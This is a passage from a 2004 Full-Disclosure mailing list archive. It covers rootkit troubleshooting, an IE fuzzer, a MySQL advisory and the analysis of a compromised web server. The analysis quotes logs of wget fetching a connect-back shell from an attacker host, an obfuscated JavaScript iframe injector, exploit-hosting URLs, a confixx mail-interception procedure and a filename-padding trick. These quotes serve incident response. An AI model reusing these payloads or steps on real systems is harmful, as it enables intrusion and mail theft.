/izMXr3xRwpP0LomRe9baCk=
=UYDQ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: Azerail (Azerailsupersecretninjaskills.com)
Date: Sat Oct 23 2004 - 21:20:43 CDT

On Sat, 23 Oct 2004, BillyBob wrote:

> I have ran Process Explorer, Code Stuff Starter but nothing shows up in the
> list as using this 25-30% of my CYP. I also updated and ran PestPatrol,
> NortonAV, etc but nothing is detected which is why I think I have a rootkit
> that has patched the kernel and therefore not allowing any of these programs
> to detect it.
>
> Anything else ?
>

Try cleaning your mouse.

Azerail
--
Thanks to the printing press, the deviant smart people managed to capture their
genius and communicate it without having to pass it on genetically. Evolution
was short-circuited. We got knowledge and technology before we got
intelligence.
                        -- Scott Adams, The Dilbert Principle
  

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Azerail (Azerailsupersecretninjaskills.com)
Date: Sat Oct 23 2004 - 21:19:11 CDT

Can we let this thread die? I mean seriously, we all get the point
that people's virus scanners can detect it and the importance of
updating virus definitions and that ISP's aren't really going to do
anything about it nor should they. Everyone chiming in with the same
two cents is getting real old.

Azerail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: MN Vasquez (mnvalumni.princeton.edu)
Date: Sat Oct 23 2004 - 22:04:48 CDT

Any odd traffic coming to or from this machine? What's a sniffer telling
you.

I might've missed it, but is this a home user machine or in a business
place?

Do you have issues running in safe mode? If you don't, then it would sound
like the rootkit's not running, which means you can probably look at some of
the normal places for a file/processes loading/starting.

I don't know about the rest of the list, but I haven't seen or heard of too
many process hiding xp rootkits that are undetectable by some of the basic
methods mentioned. See www.rootkit.com. At least, not floating around on a
single PC that sounds like an unlikely "high value" target. It seems much
more likely that XP or an application is just crapping out on you, and if
you can't figure it out, reinstall. If nothing is revealed after trying
some of the methods already suggested here and by others, I think the
likelihood -- given the info you've told us so far -- makes it's unlikely
that it's a rootkit.

My 2 cents.

> ----- Original Message -----
> From: "BillyBob" <billybobknobhotmail.com>
> To: "Alan Melia (Melmac)" <alanmemelmac.co.uk>; "'Full Disclosure'"
> <full-disclosurelists.netsys.com>
> Sent: Saturday, October 23, 2004 1:30 PM
> Subject: Re: [Full-Disclosure] Help, possible rootkit
>
>
>>I have ran Process Explorer, Code Stuff Starter but nothing shows up in
>>the
>> list as using this 25-30% of my CYP. I also updated and ran PestPatrol,
>> NortonAV, etc but nothing is detected which is why I think I have a
>> rootkit
>> that has patched the kernel and therefore not allowing any of these
>> programs
>> to detect it.
>>
>> Anything else ?
>>
>>
>> ----- Original Message -----
>> From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
>> To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
>> <full-disclosurelists.netsys.com>
>> Sent: Saturday, October 23, 2004 4:47 PM
>> Subject: RE: [Full-Disclosure] Help, possible rootkit
>>
>>
>>> First check to see what processes are running. TaskList is built in but
>>> I
>>> would recommend.
>>> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>>>
>>> Get to know your machine and what processes are running normally. With
>>> 25-30% CPU it should stick out like a sore thumb.
>>>
>>> Oh yeah don't run as admin (see )http://blogs.msdn.com/aaron_margosis.
>>>
>>> Alan
>>>
>>>
>>> -----Original Message-----
>>> From: full-disclosure-adminlists.netsys.com
>>> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
>>> Sent: 23 October 2004 17:05
>>> To: Full Disclosure
>>> Subject: [Full-Disclosure] Help, possible rootkit
>>>
>>> I have noticed that my XP system is behaving like I have a rootkit.
>>>
>>> - My mouse is jumpy (it freezes for a second when I move it around the
>>> desktop) and the minimized Taskmanager in the systray shows I have
>>> around
>>> 25 - 30 % usage, but when I open it, there is no process listed using
>>> this
>>> much.
>>> - I did a netstat, fport, openports and none of these show that I have
>>> any
>>> odd ports open or any connections established.
>>> - even when I disconnect from the Internet these symptoms do not stop.
>> They
>>> stop if I reboot, but then start again.
>>>
>>> I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and
>> they
>>> could not find anything.
>>>
>>> Any more suggestions ?
>>> Any more rootkit finding tools for Windows ?
>>>
>>> Thanks
>>> Bill

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: MN Vasquez (mnvalumni.princeton.edu)
Date: Sat Oct 23 2004 - 21:16:56 CDT

The bootable CD has already been mentioned. Have you scanned it for open
ports?

----- Original Message -----
From: "BillyBob" <billybobknobhotmail.com>
To: "Alan Melia (Melmac)" <alanmemelmac.co.uk>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 1:30 PM
Subject: Re: [Full-Disclosure] Help, possible rootkit

>I have ran Process Explorer, Code Stuff Starter but nothing shows up in the
> list as using this 25-30% of my CYP. I also updated and ran PestPatrol,
> NortonAV, etc but nothing is detected which is why I think I have a
> rootkit
> that has patched the kernel and therefore not allowing any of these
> programs
> to detect it.
>
> Anything else ?
>
>
> ----- Original Message -----
> From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
> To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
> <full-disclosurelists.netsys.com>
> Sent: Saturday, October 23, 2004 4:47 PM
> Subject: RE: [Full-Disclosure] Help, possible rootkit
>
>
>> First check to see what processes are running. TaskList is built in but
>> I
>> would recommend.
>> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>>
>> Get to know your machine and what processes are running normally. With
>> 25-30% CPU it should stick out like a sore thumb.
>>
>> Oh yeah don't run as admin (see )http://blogs.msdn.com/aaron_margosis.
>>
>> Alan
>>
>>
>> -----Original Message-----
>> From: full-disclosure-adminlists.netsys.com
>> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
>> Sent: 23 October 2004 17:05
>> To: Full Disclosure
>> Subject: [Full-Disclosure] Help, possible rootkit
>>
>> I have noticed that my XP system is behaving like I have a rootkit.
>>
>> - My mouse is jumpy (it freezes for a second when I move it around the
>> desktop) and the minimized Taskmanager in the systray shows I have around
>> 25 - 30 % usage, but when I open it, there is no process listed using
>> this
>> much.
>> - I did a netstat, fport, openports and none of these show that I have
>> any
>> odd ports open or any connections established.
>> - even when I disconnect from the Internet these symptoms do not stop.
> They
>> stop if I reboot, but then start again.
>>
>> I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and
> they
>> could not find anything.
>>
>> Any more suggestions ?
>> Any more rootkit finding tools for Windows ?
>>
>> Thanks
>> Bill
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Any update on SSH brute force attempts?

From: Miriam Chan (miriamchangeocities.com)
Date: Sat Oct 23 2004 - 20:43:17 CDT

Jay Libove wrote:
> Recently, a couple of times a week, I see repeats of this which now have
> as many as fifty different accounts being attacked. (Almost none of which
> exist on my server, and none of which will have common passwords
> thankyouverymuch).

By the way, I started to suspect that the attacks were intentional (not just
some games by some script kiddies.) I had some servers accepting SSH
connections from anywhere (this is for easy access, and I know it is not
a very good idea.)

Before I set up a Portsentry-like mechanism to block the bad hosts, I got at
least 5-6 attempts per day. Afterward, I got nearly none (just some 1-2
attempts a day.) The change looks simply too much for me. If I got some
number of attacks a day, I would expect the same number of attacks the next
day if the attackes were automatically done by some virus/worms. I wished that
it was done by some virus, because (I think) a virus is not more malicious
than a planned cracking behaviour.

Do anyone have the same observations as me ? It should be great if you saw
it and shared your ideas.

Miriam.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: Gregh (chowsozemail.com.au)
Date: Sat Oct 23 2004 - 23:36:13 CDT

----- Original Message -----
From: "MN Vasquez" <mnvalumni.princeton.edu>
To: <full-disclosurelists.netsys.com>
Sent: Sunday, October 24, 2004 1:04 PM
Subject: Re: [Full-Disclosure] Help, possible rootkit

>
> I don't know about the rest of the list, but I haven't seen or heard of too
> many process hiding xp rootkits that are undetectable by some of the basic
> methods mentioned.

Just FYI of anyone really interested in why a mouse is doing odd things since installing SP2 on XP, it is actually more common than you think and in what I have seen to date (which is, by no means, long enough to be 100% sure) limited to USB mouse users on XP using SP2. Put the mouse up the top quarter of the screen near the right hand edge and almost always, the user's pointer drifts left. Revert to SP1 and it doesn't happen.

I haven't looked for a fix as yet but I suspect it is either just a mouse driver reinstall or an update needed.

Note - for the paranoid, I don't claim this as the answer in every case. It has been what has happened on about 30 I have seen so far. Doesn't appear to affect a PS2 port mouse.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] python does mangleme (with IE bugs!)

From: ned (ndfelinemenace.org)
Date: Sat Oct 23 2004 - 23:36:32 CDT

i've made a port of mangleme:
http://felinemenace.org/~nd/htmler.py
with a few extra quirks (such as file extentions/url types)

it finds IE bugs after roughly 2.5 -> 3 hours and they are at:
http://felinemenace.org/~nd/crash_ie/

They are not the null pointer dereference that Michal found (which
curiously seems to not own my 6.0.2800.1106.xpsp1?) but some other
probably non-exploitable problems!

htmler.py doesn't use CGI like mangleme but generates webpages in the
directory 'html1' numbered 0.html to n.html. 0.html then uses a refresh to
load 1.html and so on with little user interaction required!

anyway, if you find bugs with it, don't sell to anyone/notify vendors!
- nd

--
http://felinemenace.org/~nd - "eat a duck"

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Update: Web browsers - a mini-farce (MSIE gives in)

From: Daniel Veditz (dveditzcruzio.com)
Date: Sun Oct 24 2004 - 02:58:21 CDT

Michal Zalewski wrote:
>
> I have no data on whether any of the vendors bothered to run my scripts to
> find any further problems that are bound to surface.

Yes, thank you. Mozilla testers have found additional crashing testcases and
we will add the tool to our regular testing cycle.

-Dan Veditz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Full-Disclosure digest

From: digitalchaos (digitalchaosgawab.com)
Date: Fri Sep 03 2004 - 04:27:01 CDT

Why are there virus being transmitted through this newsgroup??

OUTPUT FROM MCAFEE:
****************** McAfee VirusScan ************************
******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
*********************************************************************

McAfee VirusScan has detected a potential threat in this e-mail
sent by full-disclosure-requestlists.netsys.com.
The following actions were attempted on each suspicious part.
We strongly recommend that you report this virus-related activity
to full-disclosure-requestlists.netsys.com.

 The attachment "E-mail body" is infected with the W32/Bagle.aaMM
Virus(es).
This attachment has been quarantined.

This is not the only message I have received like this

Some were infected by NETSKY, various zip/pif virus, and such.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
full-disclosure-requestlists.netsys.com
Sent: Friday, October 22, 2004 9:24 AM
To: full-disclosurelists.netsys.com
Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Sun Oct 24 2004 - 05:32:53 CDT

Le vendredi 03 septembre 2004 à 05:27 -0400, digitalchaos a écrit :
> Why are there virus being transmitted through this newsgroup??

Because some worm are gathering email address within addressbook, emails
or HTML contents, thoses can contain Full Disclosure email address.

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: Honza Vlach (janusvolny.cz)
Date: Sun Oct 24 2004 - 05:59:16 CDT

Oh no, not again!!!
Honza

> Why are there virus being transmitted through this newsgroup??
--
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFBe4sESVzvioqX7FkRAtccAJwPoudH8m7h81BCQ8v5vyi+N85/zQCg+bgp
a6IOciNhK9Ql+ZZwHgyTS8o=
=U4EG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Sun Oct 24 2004 - 06:47:04 CDT

Hi list,
i'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
In this host now it's installed a special trojan that insert a
malicious <IFRAME> tag into every served .PHP page.

The host is running these services :

Porta 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Porta 22: SSH-1.99-OpenSSH_3.4p1
Porta 25: 220 XXXXX ESMTP 5.5.1
Porta 110: +OK <XXXXXXXXXX>
Porta 3306: MySQL 3.23.52
Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
Linux/6mdk)
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found inside Apache log that the hacker break-in inside the machine
using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines :

[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
fault (11)
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
fault (11)
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
<angdimaryahoo.it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
fault (11)
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
fault (11)
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:Lebowskilibero.it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

    0K .......... ........ 100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
fault (11)
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
fault (11)

Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
Linux,
possible containing a ConnectBack shell. Inside this ELF file you can grep
these strings:

Usage: %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
 Fuck you so
 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back

I don't know if the hacker installs in this machine a rootkit, but the check
of md5sum of
ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
was good.......

The main problem is finding how the Apache Server (or PHP) was altered by
the hacker,
because every user that connects to this host now, could be infected by
several HTML/IE recent exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
random way??)
web server inserts a special javascript between HTTP-Header and served page.
The script is :

<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>

Decoding it, I see that it writes inside the page an <IFRAME> tag pointing
to this url :

<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1
width=1></iframe>

If you surf to this page (don't do this if you use IE or are not patched)
you could got infected
by several exploits, cause it opens a lot a <iframe> pointing out to
different domains.

I would to list here these domains, cause they are a sources
for exploit studying :

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are :

1) how can I remove this injected Javascript/IFRAME ? I've checked
httpd.conf and a lot of PHP pages,
but I don't found anything.....Is it possible that the hacker install some
compromised Apache module ..so???

2) anyone knows before these sites (xpire.info or splitinfinity.info)?
why they are still online and are serving trojan/exploit on surfer browser?
xpire.info is related to "Mike Fox".....but it sounds as a fake Jonh Doe
registration!

      Domain ID: D5946452-LRMS
      Domain Name: XPIRE.INFO
      Created On: 23-May-2004 19:41:15 UTC
      Last Updated On: 02-Aug-2004 08:07:20 UTC
      Expiration Date: 23-May-2005 19:41:15 UTC
      Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
      Status: ACTIVE
      Status: OK
      Registrant ID: C4752858-LRMS
      Registrant Name: Mike Fox
      Registrant Organization: n/a
      Registrant Street1: Hali-gali, 77
      Registrant City: Deli
      Registrant Postal Code: 12345
      Registrant Country: IN
      Registrant Phone: +91.226370256
      Registrant Email: c8idkvtgarwinidkvt38yahoo.com

3) how can I understand if a rootkit was installed???

Thanks anyone for replies

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: Ali Campbell (fdisclosurealicampbell.org.uk)
Date: Sun Oct 24 2004 - 08:59:45 CDT

BillyBob wrote:

> Any more suggestions ?

I have seen something similar to this behaviour caused by a flaky power
connector in a Si3112 mirrored RAID array.

Ali

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: devis (deviseasynix.net)
Date: Sun Oct 24 2004 - 09:26:25 CDT

Well its the good old trick <string>.<good known extension>[ insert
numerous spaces here ].<nasty executable extension>

This relies on MS IExplore or Outlook to not show more than X characters
of the file name, but as your screen shots show, its detected as a
Screen saver meanijng it has a .scr extension which happens to be
executable as well.

$ file details/details.txt\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ .scr
MS-DOS executable (EXE), OS/2 or MS Windows

Does that tricks Hotmail / Mc Afee every time ?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-22 ] MySQL: Multiple vulnerabilities

From: Thierry Carrez (koongentoo.org)
Date: Sun Oct 24 2004 - 09:29:45 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: MySQL: Multiple vulnerabilities
      Date: October 24, 2004
      Bugs: #67062
        ID: 200410-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Several vulnerabilities including privilege abuse, Denial of Service,
and potentially remote arbitrary code execution have been discovered
in MySQL.

Background
==========

MySQL is a popular open-source, multi-threaded, multi-user SQL database
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 dev-db/mysql < 4.0.21 >= 4.0.21

Description
===========

The following vulnerabilities were found and fixed in MySQL:

Oleksandr Byelkin found that ALTER TABLE ... RENAME checks
CREATE/INSERT rights of the old table instead of the new one
(CAN-2004-0835). Another privilege checking bug allowed users to grant
rights on a database they had no rights on.

Dean Ellis found a defect where multiple threads ALTERing the MERGE
tables to change the UNION could cause the server to crash
(CAN-2004-0837). Another crash was found in MATCH ... AGAINST() queries
with missing closing double quote.

Finally, a buffer overrun in the mysql_real_connect function was found
by Lukasz Wojtow (CAN-2004-0836).

Impact
======

The privilege checking issues could be used by remote users to bypass
their rights on databases. The two crashes issues could be exploited by
a remote user to perform a Denial of Service attack on MySQL server.
The buffer overrun issue could also be exploited as a Denial of Service
attack, and may allow to execute arbitrary code with the rights of the
MySQL daemon (typically, the "mysql" user).

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MySQL users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=dev-db/mysql-4.0.21"
    # emerge ">=dev-db/mysql-4.0.21"

References
==========

  [ 1 ] CAN-2004-0835
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0835
  [ 2 ] CAN-2004-0836
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0836
  [ 3 ] CAN-2004-0837
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0837
  [ 4 ] Privilege granting bug
        http://bugs.mysql.com/bug.php?id=3933
  [ 5 ] MATCH ... AGAINST crash bug
        http://bugs.mysql.com/bug.php?id=3870

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Bruno Wolff III (brunowolff.to)
Date: Sun Oct 24 2004 - 09:31:30 CDT

On Fri, Oct 22, 2004 at 17:48:26 +0000,
  Ali Campbell <fdisclosurealicampbell.org.uk> wrote:
>
> I need a Linux utility which I can use to encrypt a single gzipped file
> via the command line. Obviously something open source would be
> preferable. I'm not really interested in setting up a whole suite of
> stuff with keyfiles and so on, and I don't need a public/private key
> setup, just something quick and dirty with a single secret key for
> encryption and decryption which is nevertheless reasonably strong.

If you are only automating encryption and not decryption and not signing
for integrity, you should probably reconsider using public keys since
that way you don't have to make a password available to your script.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

bowwownowhere.org
Date: Sun Oct 24 2004 - 08:18:05 CDT

Ahhhh.......checkout too
http://lists.netsys.com/pipermail/full-disclosure/2004-October/027350.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] confixx e-mail bug

From: Igor Buchmueller (bugtraqint80h.de)
Date: Sun Oct 24 2004 - 10:28:12 CDT

Hello,

I noticed a bug in confixx. Confixx is a software to administrate websites.
nice feautures are to create costumers or reseller costumers and gain them
tools to administrate theirself websites.

It is possible to catch all e-mails as a normal user which are going from the
server to domain foo.bar

1. Create a costumer in your confixx. This can be done without root
permissions on the server, you will just need a reseller account. In the
process of creating a normal costumer, you will need to assign him/her a
domain.

2. Assign, yahoo.com, hotmail.com or gmx.de to your costumer.

3. Login into your costumers account in confixx and create a wildcard e-mail
adress for your domain.

Now, all e-mails will be deliverd to your costumers account, from this confixx
server.

This worked for me, any comments?

with best regards, Igor

--
mfG, Igor B.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Kevin (KKadowgmail.com)
Date: Sun Oct 24 2004 - 13:01:08 CDT

On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio <eflorioedmaster.it> wrote:
> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
. . .
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".

I'm not sure that qmail-inject isn't a red herring? The actual
download looks like 'wget' was used.

> These are the suspicious log lines :
>
> [Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimaryahoo.it>
> [Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowskilibero.it
> sh: -c: option requires an argument
> --15:50:07-- http://xpire.info/cli.gz
> => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
>
> 0K .......... ........ 100% 9.97K
>
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
>
> [Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
>
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
>
> Usage: %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
>
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......

I assume you used a bootable CD on the infected machine to do the checksums?

> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded. It's also
possilble, but less likely, that the injection is done in a kernel
module.

> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.

Sounds like a good time to replace the entire server with a fresh build.

Kevin

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorioedmaster.it)
Date: Sun Oct 24 2004 - 14:06:51 CDT

> I'm not sure that qmail-inject isn't a red herring? The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.
After other analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here the log trapped by Apache :

----------------------------------------------------------------------------
----
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........ 100% 20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, it's possible to see that in my first showed log
the stdout
